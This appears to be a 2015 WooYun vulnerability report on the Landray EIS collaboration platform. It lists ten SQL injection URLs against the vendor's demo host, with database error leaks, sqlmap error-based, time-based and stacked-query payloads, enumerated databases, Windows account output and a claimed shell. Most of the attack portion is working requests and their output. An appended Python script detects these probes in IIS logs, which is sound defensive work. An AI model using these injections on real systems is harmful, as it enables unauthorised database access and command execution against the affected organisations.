
Landray EIS Smart Collaboration Platform: 10 SQL injection points + getshell, bundled (tested on the demo site, no login required)

2015-06-19 04:10

Official demo site: eisdemo.landray.com.cn

0x1:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

0x2:

http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1'

0x3:

http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE

0x4:

http://eisdemo.landray.com.cn/vote/service.aspx

post:action=voteid&ID=1'

0x5:

http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1'

0x6:

http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1'

0x7:

http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1'

0x8:

http://eisdemo.landray.com.cn/sm/menu_define.aspx?id=1 and 1=(select @@version)

0x9:

http://eisdemo.landray.com.cn/sm/menu_emp_edit.aspx?ID=(select @@version)

0x10:

http://eisdemo.landray.com.cn/sm/menu_left_edit.aspx?post:action=dragdrop&id=1&parent_id=1 where 1=(select @@version)--



Some affected sites:


Proof of vulnerability:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

Appending a single quote returns:

“/”应用程序中的服务器错误。



字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。

'19e789719ac343679c070110c147290e'' 附近有语法错误。



说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。



异常详细信息: System.Data.SqlClient.SqlException: 字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。

'19e789719ac343679c070110c147290e'' 附近有语法错误。



源错误:



执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。



http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=(select%20@@version)



“/”应用程序中的服务器错误。



在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)

Jun 28 2012 08:36:30

Copyright (c) Microsoft Corporation

Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)

' 转换成数据类型 int 时失败。



说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: id=1 AND 3419=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (3419=3419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113)))



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: id=1; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: id=1 WAITFOR DELAY '0:0:5'--



Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: id=(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))


---

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420

back-end DBMS: Microsoft SQL Server 2008

available databases [14]:

[*] EISdemo

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a

[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6

[*] Search_Service_Application_DB_3ea5977f6e4b46dc8e12ccaf6aebd519

[*] Search_Service_Application_LinksStoreDB_7f7c2ee474204a4b9b5773950b8735e2

[*] SharePoint_AdminContent_8d9aeb53-99b7-4c74-8e2f-133b2728da14

[*] SharePoint_Config

[*] tempdb

[*] WSS_UsageApplication



command standard output:

---

\\WIN-K56VKIJLEMJ 的用户帐户



-------------------------------------------------------------------------------

Administrator            Guest                    krbtgt

---



That's getshell.
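As an added example (not part of the original report or the vendor's code), here is a small detector that scans IIS W3C-style log lines for the probe styles shown above: the trailing single quote, the @@version int-conversion leak, the CONVERT(INT, ...) error-based and WAITFOR DELAY time-based payloads, and stacked queries. The log lines, the signature labels and the set of reported page paths are constructed for this example; a 500 on one of the ten reported pages is ranked as the verbose ASP.NET error leak seen in the proof.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines (cs-uri-stem cs-uri-query sc-status); not taken from the report.
SAMPLE_LOG = """\
/webdoc/file_download.aspx guid=19e789719ac343679c070110c147290e 200
/webdoc/file_download.aspx guid=19e789719ac343679c070110c147290e%27 500
/webdoc/file_show.aspx id=(select%20@@version) 500
/sm/menu_define.aspx id=1%20AND%203419=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(103))) 500
/sm/bulkinsert_data.aspx id=1;%20WAITFOR%20DELAY%20'0:0:5'-- 200
/sm/DictKey.aspx DictKey=hello 200"""

# The ten injectable pages the report names (paths only).
REPORTED_STEMS = {
    "/webdoc/file_download.aspx", "/webdoc/file_show.aspx", "/webdoc/HtmlSignatureServer.aspx",
    "/vote/service.aspx", "/sm/bulkinsert_data.aspx", "/sm/data_manager_right_edit.aspx",
    "/sm/DictKey.aspx", "/sm/menu_define.aspx", "/sm/menu_emp_edit.aspx", "/sm/menu_left_edit.aspx",
}
# Probe styles seen in the report and its scanner output; the labels are our own.
SIGNATURES = {
    "quote_probe": re.compile(r"'\s*$"),                       # value ending in a lone single quote
    "version_probe": re.compile(r"select\s+@@version", re.I),  # @@version leaked via int-conversion error
    "error_based_convert": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "time_based": re.compile(r"waitfor\s+delay", re.I),
    "stacked_query": re.compile(r";\s*\w"),                    # a second statement after ';'
}
def parse_query(query):
    # Split on '&' only (a ';' must stay inside the value) and URL-decode each side.
    pairs = []
    for part in filter(None, query.split("&")):
        name, _, raw = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(raw)))
    return pairs
def scan_line(line):
    # Return the stem, HTTP status and every (parameter, signature) pair that matched.
    stem, _, rest = line.partition(" ")
    query, _, status = rest.rpartition(" ")
    hits = [(name, sig) for name, value in parse_query(query)
            for sig, rx in SIGNATURES.items() if rx.search(value)]
    return {"stem": stem, "status": int(status), "hits": hits}
def scan_log(text):
    # Keep lines with a probe; a 500 on a reported page is the verbose error leak ('error_leak').
    findings = []
    for entry in map(scan_line, filter(None, text.splitlines())):
        if entry["hits"]:
            leak = entry["status"] == 500 and entry["stem"] in REPORTED_STEMS
            entry["verdict"] = "error_leak" if leak else "alert"
            findings.append(entry)
    return findings
```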

Fix:

The vendor knows how.


Source: www.wooyun.org/bugs/wooyun-2015-0111278
